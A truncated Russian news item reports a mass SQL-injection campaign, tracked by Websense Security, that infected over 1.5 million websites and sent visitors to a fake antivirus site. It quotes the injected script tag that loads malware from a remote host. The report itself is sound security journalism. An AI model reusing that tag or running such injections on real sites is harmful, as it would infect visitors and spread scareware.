Хакеры внедряют код на языке SQL в ссылки страниц и перенаправляют пользователей на фальшивый сайт.
Более 1,5 млн сайтов по всему миру заразились в результате атаки вирусом, который встраивает в URL ссылки на вредоносный файл. Такова предварительная оценка масштабов атаки типа "SQL-внедрение", которую провели специалисты Websense Security. Эта американская лаборатория впервые заметила вредоносные файлы 29 марта.
Внедряемый файл меняет текстовые поля в базе данных и внедряет в них дополнительный фрагмент <script src=hxxp://lizamoon.com/ur.php></script>, который загружает с удаленного сервера вредоносную программу. Затем пользователей направляли сайт с фальшивыми антивирусными утилитами под названием Windows Stability Center. С него предлагалось за деньги загрузить антивирусное ПО. Microsoft о ... Читать дальше »